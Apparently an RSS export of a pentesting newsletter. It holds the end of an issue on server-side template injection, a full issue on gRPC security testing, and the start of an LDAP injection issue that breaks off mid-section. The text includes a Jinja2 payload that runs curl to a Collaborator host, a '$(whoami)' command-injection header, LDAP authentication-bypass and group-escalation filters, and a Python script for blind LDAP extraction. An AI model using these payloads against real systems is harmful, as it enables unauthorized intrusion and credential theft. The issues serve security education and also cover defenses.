**[PayloadsAllTheThings - SSTI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)**: Comprehensive payload collection for all major template engines. Includes detection payloads, exploitation chains, and bypass techniques. Essential reference during pentests.

**[Burp Suite Collaborator](https://portswigger.net/burp/documentation/collaborator)**: Useful for blind SSTI detection. Inject payloads that trigger DNS or HTTP requests to your Collaborator domain:

```python
# Jinja2 blind SSTI
{{config.__class__.__init__.__globals__[&apos;os&apos;].popen(&apos;curl http://YOUR_COLLABORATOR.burpcollaborator.net&apos;).read()}}
```

## 🧪 Labs &amp; Practice

**[PortSwigger Web Security Academy](https://portswigger.net/web-security/server-side-template-injection)**:

- [Basic server-side template injection](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic): Delete a file using ERB template injection
- [Basic server-side template injection (code context)](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic-code-context): Exploit Tornado template in code context
- [Server-side template injection using documentation](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation): Identify template engine and exploit using documentation
- [Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit): Find and use public exploits
- [Server-side template injection with information disclosure via user-supplied objects](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-with-information-disclosure-via-user-supplied-objects): Exploit object access to leak secret keys

**HackTheBox**:

- **[Spider](https://app.hackthebox.com/machines/Spider)**: Hard-rated retired Linux machine with Jinja2 SSTI exploitation featuring character length limitations and filter bypasses
- **[Late](https://app.hackthebox.com/machines/Late)**: Easy-rated machine with SSTI vulnerability in text reading application leading to RCE
- **[Doctor](https://app.hackthebox.com/machines/Doctor)**: Medium-rated machine exploitable via SSTI
- **Neonify** (Challenge): ERB (Ruby) SSTI with regex filter bypass
- **HTB Academy - Server-side Attacks Course**: Dedicated module covering SSTI identification and exploitation

**TryHackMe**:

Search for &quot;Server Side Template Injection&quot; or &quot;SSTI&quot; on the platform for dedicated rooms covering exploitation techniques and hands-on practice

## 🔒 Defense &amp; Mitigation

**For Developers:**

**1. Never use user input to construct templates**

```python
# BAD - User input in template string
template = &quot;Hello, &quot; + user_name + &quot;!&quot;
render(template)

# GOOD - User input in template data
template = &quot;Hello, {{name}}!&quot;
render(template, {&apos;name&apos;: user_name})
```

**2. Use sandboxed template engines**

Enable sandboxing where available:

```python
# Jinja2 with sandbox
from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()
```

**3. Implement strict allow-lists for template features**

Disable unnecessary template features:

```python
# Disable dangerous filters and functions
env = Environment(
    autoescape=True,
    extensions=[],  # No extensions
)
```

**4. Use logic-less template engines**

Consider using engines that don&apos;t support code execution:

- Mustache (logic-less by design)
- Handlebars (limited logic)

**5. Apply Content Security Policy (CSP)**

While CSP won&apos;t stop SSTI, it can limit post-exploitation impact by preventing data exfiltration or callback to attacker infrastructure.

**For Pentesters:**

- Test all user-controllable input that appears in rendered output
- Check for SSTI in less obvious places: HTTP headers, file uploads (especially filenames), API parameters
- Try multiple syntax variations to identify the engine
- Use Burp Collaborator for blind SSTI detection
- Don&apos;t stop at information disclosure. Always attempt RCE
- Check for filter bypasses if basic payloads fail

## 🎯 Key Takeaways

- **SSTI occurs when user input is embedded directly into template code** rather than template data
- **Template engines are designed to execute code**, making SSTI particularly dangerous
- **Detection is straightforward** using mathematical expressions like `{{7*7}}`
- **Engine identification is critical** since exploitation techniques vary significantly
- **Sandbox escapes are possible** in most template engines through object introspection
- **RCE is the end goal** but information disclosure (config, secrets) is also valuable
- **Prevention requires strict separation** between template structure and user data
- **Multiple 2024 CVEs demonstrate** this remains an active threat in modern applications

## 📚 Further Reading

- **[PortSwigger - Server-side template injection](https://portswigger.net/web-security/server-side-template-injection)**: Comprehensive guide with interactive labs
- **[PortSwigger Research - Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection)**: Original 2015 research by James Kettle
- **[HackTricks - SSTI](https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/index.html)**: Extensive SSTI reference with payloads for all major engines
- **[PayloadsAllTheThings - SSTI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)**: Community-maintained payload collection
- **[OWASP - Server-Side Template Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection)**: OWASP testing guide for SSTI
- **[Flask Documentation - Templates](https://flask.palletsprojects.com/en/stable/templating/)**: Official Jinja2/Flask template documentation
- **[NVD - CVE Database](https://nvd.nist.gov/)**: National Vulnerability Database for CVE details

---

That&apos;s it for this week!

SSTI is one of those vulnerabilities that feels like finding a skeleton key. When you discover it, you often go straight from limited user input to full server compromise. No privilege escalation needed. No lateral movement. Just inject a payload and you&apos;re executing code as the application user.

The key is recognizing the opportunity. When you see template syntax in user-controllable fields, test for evaluation. When you find mathematical expressions rendering as calculated values, dig deeper. And when you identify the template engine, consult the documentation and payload collections to build your exploit chain.

Start with the PortSwigger labs. They&apos;re excellent for understanding the fundamentals. Then move to HackTheBox machines where SSTI is one step in a larger attack chain. Practice identifying engines from error messages. Build muscle memory for common exploitation patterns.

See you in the next issue 🔥

Thanks for reading, and happy hacking!

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>gRPC Security: Breaking the High-Performance RPC Protocol</title><link>https://www.kayssel.com/newsletter/issue-31</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-31</guid><description>A practical guide to gRPC security testing covering service enumeration, metadata exploitation, authentication bypass, and protobuf manipulation</description><pubDate>Sun, 04 Jan 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone, and happy new year!

Hope you all had a good start to 2026. A few months back, I had an assessment that involved testing a distributed system built with gRPC. I&apos;d seen gRPC mentioned in microservice architectures before, but had never really worked with it hands-on.

Here&apos;s what I learned. The client had multiple services communicating via gRPC. Traditional web app testing techniques didn&apos;t apply. Burp couldn&apos;t properly intercept the traffic out of the box. Directory fuzzing was useless. The service didn&apos;t return HTML or JSON, just binary data I couldn&apos;t make sense of at first.

I knew gRPC used Protocol Buffers (protobuf) for serialization and HTTP/2 for transport. But understanding the theory and actually working with it are two different things. I spent time figuring out basic enumeration. How do you discover available methods? How do you call them? What does authentication look like in gRPC?

After going through the learning curve and working with the tools, I got a much better understanding of how gRPC works from a security perspective. That&apos;s why I wanted to share what I learned with you. gRPC is everywhere in modern backend infrastructure. Kubernetes uses it. Microservices love it. Cloud-native apps depend on it. And security testing for gRPC requires a different approach than REST APIs.

In this issue, I&apos;ll cover the basics of what gRPC is and why it matters for security testing. We&apos;ll go through service discovery and enumeration techniques. You&apos;ll learn how to intercept and work with gRPC traffic, common security issues to look for, and the tools that make testing gRPC more approachable. We&apos;ll wrap up with hands-on labs you can use to practice.

If you&apos;ve been curious about gRPC but found it intimidating, this is your starting point.

Let&apos;s dive into gRPC 👇

## 🔍 What is gRPC and Why It Matters

gRPC is a Remote Procedure Call (RPC) framework developed by Google. Think of it as a way for services to call functions on other services as if they were local, except those services might be running on different machines, in different data centers, across the internet.

**Why companies use gRPC:**

It&apos;s fast. Protocol Buffers (protobuf) serialize data more efficiently than JSON. Binary encoding means smaller payloads and faster parsing. HTTP/2 multiplexing allows multiple requests over a single connection without blocking.

It&apos;s strongly typed. You define your API using `.proto` files (protobuf schemas). These schemas specify exactly what data types each method accepts and returns. No guessing, no surprises. Client and server code gets generated automatically from these schemas.

It supports bidirectional streaming. Not just request-response like REST. You can have server streaming (one request, multiple responses), client streaming (multiple requests, one response), or full bidirectional streaming. Perfect for real-time data, chat systems, or monitoring dashboards.

**Why this matters for pentesters:**

Traditional web app tools don&apos;t work out of the box. Burp Suite sees gRPC traffic as binary HTTP/2 data. You can&apos;t just click &quot;Intercept&quot; and read the request like you would with JSON. Directory brute-forcing doesn&apos;t help because gRPC doesn&apos;t use URL paths the way REST does.

Authentication and authorization work differently. Many gRPC services use metadata (HTTP/2 headers) for auth tokens instead of cookies or Authorization headers. Access controls are often method-level, not route-level. Misconfigurations are common.

The attack surface is different. You&apos;re looking at reflection endpoints, metadata manipulation, protobuf deserialization issues, and method-level access controls. Error messages leak service structure. Streaming endpoints can be abused for DoS. And many developers assume gRPC is &quot;internal only&quot; so they skip security controls.

**gRPC Architecture Basics:**

```
Client                          Server
  |                               |
  | 1. Define API (.proto file)   |
  |------------------------------&gt;|
  |                               |
  | 2. Generate code (protoc)     |
  |                               |
  | 3. Call remote method         |
  |------------------------------&gt;|
  |   (binary protobuf over HTTP/2)
  |                               |
  | 4. Response (binary protobuf) |
  |&lt;------------------------------|
```

**Key components:**

**Protocol Buffers (.proto files)**: Define the API contract. Specify services, methods (RPCs), and message types.

**HTTP/2**: Transport layer. All gRPC uses HTTP/2, which means multiplexing, header compression, and binary framing.

**Metadata**: Key-value pairs sent with requests (like HTTP headers). Used for authentication, tracing, authorization.

**Service Definition**: Methods exposed by the server. Each method has input and output message types.

## 🕵️ Enumerating gRPC Services

First problem: how do you even know what methods are available?

With REST APIs, you might have OpenAPI/Swagger docs, or you can brute-force paths. With gRPC, there&apos;s no standard documentation endpoint. But there&apos;s something better: **reflection**.

### gRPC Reflection

Many gRPC servers enable reflection for development and debugging. Reflection is an API that lets you query the server for available services and methods. It&apos;s like asking the server &quot;what can you do?&quot; and getting a full list back.

**Check if reflection is enabled:**

```bash
# Using grpcurl (we&apos;ll install this in a moment)
grpcurl -plaintext target.com:50051 list
```

If reflection is enabled, you&apos;ll see output like:

```
grpc.health.v1.Health
grpc.reflection.v1alpha.ServerReflection
myapp.UserService
myapp.PaymentService
```

**List methods for a service:**

```bash
grpcurl -plaintext target.com:50051 list myapp.UserService
```

Output:

```
myapp.UserService.GetUser
myapp.UserService.CreateUser
myapp.UserService.DeleteUser
myapp.UserService.UpdateUser
```

**Describe a method:**

```bash
grpcurl -plaintext target.com:50051 describe myapp.UserService.GetUser
```

Output shows the protobuf definition:

```protobuf
myapp.UserService.GetUser is a method:
rpc GetUser ( .myapp.GetUserRequest ) returns ( .myapp.User );
```

**Describe message types:**

```bash
grpcurl -plaintext target.com:50051 describe myapp.GetUserRequest
```

Output:

```protobuf
myapp.GetUserRequest is a message:
message GetUserRequest {
  int32 user_id = 1;
}
```

Now you know exactly what data to send.

### When Reflection is Disabled

If reflection is off, you need the `.proto` files to know what methods exist.

**Where to find .proto files:**

**GitHub/GitLab**: Search the client&apos;s public repos for `.proto` files. Many companies accidentally commit these.

**Client-side code**: Mobile apps, web clients, or SDK packages often bundle .proto files or generated code.

**Documentation**: Internal wikis, API docs, or developer portals sometimes leak protobuf definitions.

**Decompiled clients**: If you have a compiled client (Go binary, Java JAR), decompile it and extract embedded protobuf schemas.

**Guessing/Fuzzing**: If you know common method names (GetUser, ListItems, CreateOrder), you can try calling them. gRPC error messages will tell you if the method exists but you sent wrong data.

**Example of extracting from a Go binary:**

```bash
# Go embeds protobuf descriptors in binaries
strings client_binary | grep -i &quot;\.proto&quot;

# Use protoc --decode to reverse-engineer messages from captured traffic
```

### Port and Service Discovery

gRPC commonly runs on:
- **50051** (default gRPC port)
- **443** (HTTPS, especially in production)
- **8080, 8443, 9090** (common custom ports)

**Scan for gRPC services:**

```bash
# Nmap with http2 detection
nmap -p 50051,443,8080,8443,9090 -sV --script http2-detect target.com

# Check TLS/non-TLS
grpcurl -plaintext target.com:50051 list  # Non-TLS
grpcurl target.com:443 list                # TLS
```

## 🔓 Common gRPC Vulnerabilities

### 1. Insecure Reflection in Production

Reflection should be disabled in production environments. It exposes your entire API surface. However, developers sometimes forget to turn it off.

**Impact**: Full service enumeration becomes possible. Anyone can discover every method, every parameter, every message type. Use the enumeration techniques covered earlier to map the attack surface.

### 2. Missing Authentication/Authorization

Some methods require authentication, others don&apos;t. Developers sometimes assume gRPC is &quot;internal only&quot; and skip authentication entirely.

**Testing strategy**: Try calling methods without metadata (no auth token). If successful, test with common metadata patterns like `Authorization: Bearer &lt;token&gt;` or custom headers like `x-api-key`. Many services inconsistently apply authentication across different methods.

### 3. Insecure Direct Object Reference (IDOR)

Just like REST APIs, gRPC services can have IDOR vulnerabilities if authorization checks are missing at the method level. Test by accessing your own resources first, then try accessing other users&apos; data by modifying ID parameters.

### 4. Metadata Injection

Metadata is like HTTP headers. If the server trusts metadata values without validation, you can inject malicious data.

**Common injection points**: SQL injection in custom metadata fields (e.g., `x-user-role: admin&apos; OR &apos;1&apos;=&apos;1`), command injection in tracing headers (e.g., `x-trace-id: $(whoami)`), and log injection in debugging metadata. Test any metadata field that gets processed server-side.

### 5. Protobuf Deserialization Issues

Protocol Buffers are generally safe, but misuse can lead to issues. Test with extreme values: maximum integers (9223372036854775807), negative numbers (-1), and out-of-range values. Schema type definitions don&apos;t guarantee server-side validation.

### 6. Denial of Service (DoS)

gRPC&apos;s bidirectional streaming can be abused by sending massive data streams. Also test with extremely large protobuf messages to trigger memory exhaustion. Use load testing tools like `ghz` (covered later) for systematic DoS testing.

### 7. Information Disclosure

gRPC error messages are verbose. Trigger errors with invalid input to check for stack traces (file paths, library versions), SQL errors (table names, columns), and internal service names.

## 🔨 Intercepting and Manipulating gRPC Traffic

### Using Burp Suite

Burp Suite supports HTTP/2, but gRPC traffic is binary. You need to decode it.

**Method 1: Burp Extensions**

Install the **gRPC Web Developer Tools** extension from BApp Store. It decodes protobuf messages automatically if you provide the .proto files.

**Method 2: Manual Decoding**

Capture HTTP/2 traffic in Burp. Use `protoc` to decode the binary data manually.

```bash
# Save the binary request body to a file
cat request.bin | protoc --decode=myapp.GetUserRequest user.proto
```

### Using mitmproxy

mitmproxy has better HTTP/2 support than Burp for gRPC.

**Setup:**

```bash
# Install mitmproxy
pip install mitmproxy

# Start proxy
mitmproxy -p 8080 --mode http2
```

**Configure client to use proxy:**

```bash
# Set environment variables
export GRPC_PROXY=http://localhost:8080
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080

# Or use grpcurl with proxy
grpcurl -insecure -proxy http://localhost:8080 target.com:443 list
```

### Using grpcui

For a more visual approach, grpcui provides a browser-based interface for testing gRPC services. See the Essential Tools section below for installation and usage.

## 🛠️ Essential Tools

**grpcurl**: The `curl` of gRPC. Essential command-line tool for enumeration and testing. Install: `go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest`

**grpcui**: Web-based UI for interactive gRPC testing. Much easier than crafting JSON manually. Install: `go install github.com/fullstorydev/grpcui/cmd/grpcui@latest`

**ghz**: Load testing tool for gRPC. Perfect for DoS testing and benchmarking. Install: `go install github.com/bojand/ghz/cmd/ghz@latest`

**Postman**: Now supports gRPC natively. Import .proto files and test with a familiar GUI.

**Burp Suite Extensions**: gRPC Web Developer Tools and Protobuf Decoder for intercepting and decoding traffic.

**protoc**: Protocol Buffer compiler for encoding/decoding messages manually. Install via `brew install protobuf` (macOS) or `apt-get install protobuf-compiler` (Linux).

**grpc_cli**: Official Google tool, similar to grpcurl. Requires gRPC C++ installation.

## 🧪 Labs and Practice

Honestly, there aren&apos;t many dedicated gRPC security labs out there yet. The technology is still relatively niche in the security training space. Here&apos;s what I found useful:

**gRPC Goat**

Intentionally vulnerable gRPC application for learning security testing.

Repository: [https://github.com/rootxjs/grpc-goat](https://github.com/rootxjs/grpc-goat)

Covers:
- Insecure reflection
- Missing authentication
- IDOR vulnerabilities
- Metadata injection
- Multiple CTF-style challenges

This is your best bet for hands-on gRPC security practice. The challenges are well-designed and cover real-world vulnerabilities.

**Build Your Own**

Since there aren&apos;t many public labs, building your own vulnerable gRPC service is valuable practice. Start with a simple Python service that has intentional vulnerabilities: no authentication, reflection enabled, and IDOR flaws. Use the gRPC Python quickstart guide and introduce vulnerabilities like missing metadata validation, unrestricted method access, and exposed reflection endpoints. Test with grpcurl to verify the vulnerabilities are exploitable.

## 🎯 Key Takeaways

gRPC is fundamentally different from REST. Binary encoding, HTTP/2 transport, and protobuf schemas mean you need different approaches for testing. Your usual tools and techniques need adjustment.

Reflection makes enumeration straightforward. When enabled, you can discover the full API surface instantly: services, methods, message types, everything. This is why reflection should be disabled in production, though it&apos;s sometimes left on accidentally.

Authentication and authorization patterns differ from traditional web apps. Many services assume gRPC is internal-only, which can lead to missing authentication controls. Always check method-level access controls, not just service-level ones.

Traditional security concepts still apply. IDOR, injection attacks via metadata, and DoS through streaming abuse are all possible. The transport layer is different, but the underlying security principles remain the same.

Tools make the difference. grpcurl and grpcui transform what would be tedious binary manipulation into manageable testing. Learning these tools is essential for working effectively with gRPC.

Error messages can reveal system information. gRPC error responses tend to be verbose, sometimes including stack traces, database errors, or internal service names. This information is valuable for understanding the system architecture.

.proto files are valuable resources. If you can find the protobuf schemas (from GitHub, client apps, or documentation), you have the complete API specification. This makes testing much more systematic and thorough.

## 📚 Further Reading

- **[gRPC Official Documentation](https://grpc.io/docs/)**: Complete reference for gRPC concepts and implementation
- **[grpcurl GitHub](https://github.com/fullstorydev/grpcurl)**: Essential command-line tool for gRPC testing
- **[grpcui GitHub](https://github.com/fullstorydev/grpcui)**: Web-based gRPC testing interface
- **[OWASP API Security Top 10](https://owasp.org/www-project-api-security/)**: Many principles apply to gRPC
- **[Protocol Buffers Documentation](https://protobuf.dev/)**: Understanding protobuf is crucial for gRPC testing
- **[Awesome gRPC Security](https://github.com/grpc-ecosystem/awesome-grpc#security)**: Curated list of gRPC security resources
- **[gRPC Security Guide by Trail of Bits](https://blog.trailofbits.com/2022/11/18/securing-grpc-communication/)**: Production security best practices
- **[HackTricks](https://book.hacktricks.wiki/)**: General pentesting techniques and resources

---

That&apos;s it for this week!

gRPC is becoming standard in microservice architectures. Kubernetes, Istio, Envoy, and countless backend services use it for inter-service communication. Understanding how to work with gRPC is increasingly important for security testing.

The learning curve is real. Binary protocols and protobuf schemas are different from JSON and REST. But once you understand the fundamentals and get comfortable with the tools, working with gRPC becomes much more approachable.

Start with grpcurl to understand the basics. Practice on lab environments. Learn how reflection works. Understand metadata patterns. Build your knowledge step by step.

Thanks for reading, and keep learning in 2026 🚀

— Ruben</content:encoded><category>Newsletter</category><category>api-security</category><author>Ruben Santos</author></item><item><title>LDAP Injection: Breaking Active Directory Authentication &amp; Enumeration</title><link>https://www.kayssel.com/newsletter/issue-30</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-30</guid><description>A deep dive into LDAP injection exploitation, blind LDAP attacks, advanced AD enumeration via LDAP queries, and pass-back attacks against LDAP servers</description><pubDate>Sun, 28 Dec 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

**This is the last newsletter of 2025.** I hope you&apos;re having great holidays with family and friends. Thanks for following along this year!

It&apos;s been a while since I&apos;ve touched Active Directory topics. The last AD-focused issue was **Issue 21** on NTLM Relay back in October. Since then we&apos;ve covered XXE, Docker escapes, prototype pollution, file uploads, and more. But I&apos;ve been missing the Windows world.

Here&apos;s the thing: Active Directory is everywhere in corporate environments. Every pentest involves AD in some form. And while Kerberos attacks and NTLM relay get attention, LDAP often flies under the radar.

LDAP (Lightweight Directory Access Protocol) is the backbone of AD. It&apos;s how applications query users, validate groups, and authenticate. Web apps, VPNs, wikis, ticket systems—they all talk to AD via LDAP.

LDAP injection is like SQL injection&apos;s less famous cousin. Same concept: untrusted input gets concatenated into queries, leading to authentication bypass, information disclosure, and privilege escalation. Developers who carefully parameterize SQL queries sometimes forget LDAP can be exploited the same way.

What makes LDAP injection particularly nasty is that LDAP servers contain **everything** about your target network. User accounts, password hashes, group memberships, GPOs, trust relationships. If you can manipulate LDAP queries, you can extract sensitive data or bypass authentication entirely.

Beyond injection, LDAP is a goldmine for enumeration. Even without vulnerabilities, you can abuse legitimate LDAP queries to map the entire AD structure. We covered basic AD enumeration in **Issue 19**, but this time we&apos;re going deep on LDAP-specific attacks.

We&apos;ll also cover **pass-back attacks**—a clever trick where you redirect LDAP authentication to a server you control, capturing credentials in plaintext. This works against network devices, printers, and enterprise applications.

**What we&apos;ll cover:**
- LDAP fundamentals and query syntax
- Classic and blind LDAP injection techniques
- Advanced AD enumeration via LDAP queries
- Pass-back attacks for credential capture
- Defense strategies and hands-on labs

If you&apos;re testing corporate networks or auditing enterprise applications with LDAP authentication, this is essential knowledge.

Let&apos;s break some directories 👇

## 🗂️ LDAP Fundamentals

Before we start breaking LDAP, let&apos;s talk about what it is and how it works. If you&apos;re already comfortable with LDAP syntax, skip ahead. But if LDAP queries look like cryptic hieroglyphs, this section is for you.

### What is LDAP?

LDAP (Lightweight Directory Access Protocol) is a protocol for accessing and maintaining directory services. Think of it like a phone book for your network. It stores information about users, computers, groups, and other resources in a hierarchical tree structure.

Active Directory uses LDAP as its primary query protocol. When you run `net user /domain` on Windows, that&apos;s an LDAP query under the hood. When a web app checks if a user belongs to the &quot;Admins&quot; group, that&apos;s LDAP. When you authenticate to a VPN using your domain credentials, that&apos;s LDAP.

LDAP runs on TCP port **389** (unencrypted) or **636** (LDAPS, encrypted with TLS). In AD environments, Domain Controllers listen on both ports.

### LDAP Directory Structure

LDAP data is organized in a tree called the **Directory Information Tree (DIT)**. The tree is made up of **entries**, and each entry has a **Distinguished Name (DN)** that uniquely identifies it.

**Example DN:**
```
CN=John Doe,OU=Users,OU=Corporate,DC=example,DC=com
```

**Breaking it down:**
- **CN** (Common Name): `John Doe`
- **OU** (Organizational Unit): `Users` (inside `Corporate`)
- **DC** (Domain Component): `example.com`

This DN represents a user object named &quot;John Doe&quot; in the &quot;Users&quot; OU of the &quot;Corporate&quot; OU in the `example.com` domain.

### LDAP Queries and Filters

LDAP queries use **search filters** to find entries. Filters are written in a specific syntax with parentheses and logical operators.

**Basic filter examples:**

Find all users:
```
(objectClass=user)
```

Find a specific user by username:
```
(sAMAccountName=jdoe)
```

Find users in a specific group:
```
(memberOf=CN=Domain Admins,CN=Users,DC=example,DC=com)
```

**Logical operators:**

**AND** (`&amp;`):
```
(&amp;(objectClass=user)(sAMAccountName=jdoe))
```

**OR** (`|`):
```
(|(sAMAccountName=jdoe)(sAMAccountName=admin))
```

**NOT** (`!`):
```
(&amp;(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))
```
(This finds enabled user accounts by filtering out disabled ones)

### LDAP Attributes

Every LDAP entry has attributes. In Active Directory, user objects have attributes like:

- **sAMAccountName**: Username (e.g., `jdoe`)
- **userPrincipalName**: Email-style login (e.g., `jdoe@example.com`)
- **memberOf**: Groups the user belongs to
- **userAccountControl**: Account flags (disabled, locked, password expired, etc.)
- **pwdLastSet**: When password was last changed
- **adminCount**: If set to 1, user is/was a privileged account
- **servicePrincipalName**: SPNs for Kerberoasting (covered in Issue 2)

These attributes are what attackers extract during enumeration and what applications query during authentication.

### Authentication via LDAP

Here&apos;s how LDAP authentication typically works:

1. User submits username and password to an application
2. Application constructs an LDAP query to find the user:
   ```
   (&amp;(objectClass=user)(sAMAccountName=USERNAME))
   ```
3. If found, application attempts an LDAP **bind** operation with the user&apos;s DN and password
4. If bind succeeds, authentication is successful

This is where LDAP injection comes in. If the application doesn&apos;t sanitize `USERNAME`, an attacker can manipulate the filter to bypass authentication or extract information.

## 🔓 LDAP Injection: Authentication Bypass

LDAP injection works like SQL injection. If user input is concatenated directly into LDAP filters without sanitization, attackers can modify the query logic.

### Classic Authentication Bypass

Let&apos;s say an application uses this LDAP filter for authentication:

```
(&amp;(objectClass=user)(sAMAccountName=USERNAME)(userPassword=PASSWORD))
```

The application expects:
- Username: `jdoe`
- Password: `SecureP@ss123`

Resulting filter:
```
(&amp;(objectClass=user)(sAMAccountName=jdoe)(userPassword=SecureP@ss123))
```

But what if the attacker provides:
- Username: `jdoe)(&amp;))`
- Password: `anything`

The filter becomes:
```
(&amp;(objectClass=user)(sAMAccountName=jdoe)(&amp;))(userPassword=anything))
```

Breaking this down:
1. `(&amp;(objectClass=user)(sAMAccountName=jdoe)(&amp;))` - This is always TRUE
2. `(userPassword=anything))` - This is orphaned and ignored

The query returns the user `jdoe` **without validating the password**. Authentication bypassed.

### Example: Login Bypass

Imagine a web application with this vulnerable PHP code:

```php
&lt;?php
$username = $_POST[&apos;username&apos;];
$password = $_POST[&apos;password&apos;];

// VULNERABILITY: Direct concatenation without sanitization
$filter = &quot;(&amp;(objectClass=user)(uid=$username)(userPassword=$password))&quot;;

$ldap = ldap_connect(&quot;ldap://dc.example.com&quot;);
$bind = ldap_bind($ldap, &quot;cn=admin,dc=example,dc=com&quot;, &quot;admin_password&quot;);
$search = ldap_search($ldap, &quot;dc=example,dc=com&quot;, $filter);
$entries = ldap_get_entries($ldap, $search);

if ($entries[&apos;count&apos;] &gt; 0) {
    echo &quot;Login successful!&quot;;
} else {
    echo &quot;Invalid credentials.&quot;;
}
?&gt;
```

**Attack payload:**

Username: `admin)(&amp;))`
Password: `(leave empty or anything)`

The resulting filter:
```
(&amp;(objectClass=user)(uid=admin)(&amp;))(userPassword=))
```

The application searches for any user with `uid=admin` and the `(&amp;)` (always true) condition makes the filter match. Password check is bypassed.

### Wildcards for Enumeration

LDAP supports wildcards (`*`). This is useful for enumeration even when you can&apos;t bypass authentication directly.

**Example: Extracting usernames**

If you control the username field and the app returns different responses for valid vs invalid users, you can enumerate accounts:

Username: `a*`
Result: Returns users starting with &apos;a&apos;

Username: `admin*`
Result: Returns users starting with &apos;admin&apos;

You can brute-force character by character:
- `a*` → success → `aa*`, `ab*`, `ac*` → `ad*` → success → `adm*` → success → `admin` → **found**

### OR Injection for Privilege Escalation

If you can inject an OR condition, you can match additional users beyond your own account.

**Example:**

Imagine the app searches for:
```
(&amp;(objectClass=user)(sAMAccountName=USERNAME)(memberOf=CN=Standard Users,DC=example,DC=com))
```

This restricts login to members of &quot;Standard Users&quot; group.

**Attack payload:**

Username: `attacker)(|(memberOf=CN=Domain Admins,DC=example,DC=com))(&amp;(sAMAccountName=`

Resulting filter:
```
(&amp;(objectClass=user)(sAMAccountName=attacker)(|(memberOf=CN=Domain Admins,DC=example,DC=com))(&amp;(sAMAccountName=)(memberOf=CN=Standard Users,DC=example,DC=com))
```

This modifies the logic to:
- Find users named `attacker` OR users in `Domain Admins`

If the application doesn&apos;t validate group membership server-side, you might escalate privileges.

## 🕵️ Blind LDAP Injection

Sometimes you can inject into LDAP queries but can&apos;t see the results directly. The application doesn&apos;t display query output, but you can infer information based on timing, errors, or boolean responses (login success vs failure).

This is **blind LDAP injection**, analogous to blind SQL injection.

### Boolean-Based Blind LDAP Injection

If the application behaves differently when a query matches vs doesn&apos;t match, you can extract data one bit at a time.

**Scenario:**

The app shows &quot;User exists&quot; or &quot;User not found&quot; based on LDAP query results, but doesn&apos;t show the actual data.

**Attack technique:**

Extract the admin password hash character by character using wildcards.

**Example:**

Assume the LDAP filter is:
```
(sAMAccountName=USERNAME)
```

**Payload 1:**
```
(sAMAccountName=admin)(userPassword=a*)
```

If response is &quot;User exists&quot;, the password starts with `a`. If not, try `b*`, `c*`, etc.

**Payload 2:**
```
(sAMAccountName=admin)(userPassword=ab*)
```

Continue brute-forcing character by character.

### Time-Based Blind LDAP Injection

Some LDAP servers (especially AD) have performance differences based on query complexity. By injecting filters that cause the server to process large result sets, you can infer information based on response time.

This is less reliable than boolean-based attacks but can work when you have no other feedback.

**Example:**

Inject a filter that matches all users:
```
(sAMAccountName=*)(objectClass=user)
```

If this causes a delay compared to a filter that matches no users, you can infer the query executed.

### Extracting Information with Blind Injection

Let&apos;s say you want to extract the `description` attribute of the `admin` user.

**Filter construction:**
```
(&amp;(sAMAccountName=admin)(description=A*))
```

If the response indicates success (login works, or &quot;user found&quot;), the description starts with &apos;A&apos;. If not, try &apos;B&apos;, &apos;C&apos;, etc.

Once you find the first character, move to the second:
```
(&amp;(sAMAccountName=admin)(description=Aa*))
(&amp;(sAMAccountName=admin)(description=Ab*))
```

This is tedious, but scriptable.

### Tools for Blind LDAP Injection

Manual exploitation is slow. Automate it with scripts.

**Python Example (Boolean-Based):**

```python
import requests
import string

# Characters to test (alphanumeric + special chars)
charset = string.ascii_letters + string.digits + &quot;_-@.&quot;

def test_char(known, char):
    payload = f&quot;admin)(description={known}{char}*&quot;
    response = requests.post(&quot;https://target.com/login&quot;, data={
        &quot;username&quot;: payload,
        &quot;password&quot;: &quot;anything&quot;
    })
    # Adjust based on application response
    return &quot;User exists&quot; in response.text

def extract_description():
    known = &quot;&quot;
    while True:
        found = False
        for char in charset:
            if test_char(known, char):
                known += char
                print(f&quot;[+] Found: {known}&quot;)
                found = True
                break
        if not found:
            break
    return known

admin_description = extract_description()
print(f&quot;[+] Admin description: {admin_description}&quot;)
```

This script brute-forces the `description` attribute character by character.

## 🔍 Advanced AD Enumeration via LDAP

Even without injection vulnerabilities, you can abuse legitimate LDAP queries to map Active Directory. If you have valid domain credentials (even low-privilege), you can query LDAP for sensitive information.

This goes beyond basic enumeration (covered in Issue 19) and focuses on LDAP-specific techniques.

### Authenticated LDAP Queries

Once you have credentials (via phishing, password spraying, or compromising a workstation), you can bind to LDAP and run queries.

**Using ldapsearch (Linux):**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=user)&quot;
```

**Flags:**
- `-x`: Simple authentication
- `-H`: LDAP server
- `-D`: Bind DN (your user)
- `-w`: Password
- `-b`: Base DN (search root)
- Filter: `(objectClass=user)`

This dumps all user objects in the domain.

### Enumerating High-Value Targets

**Find Domain Admins:**

```bash
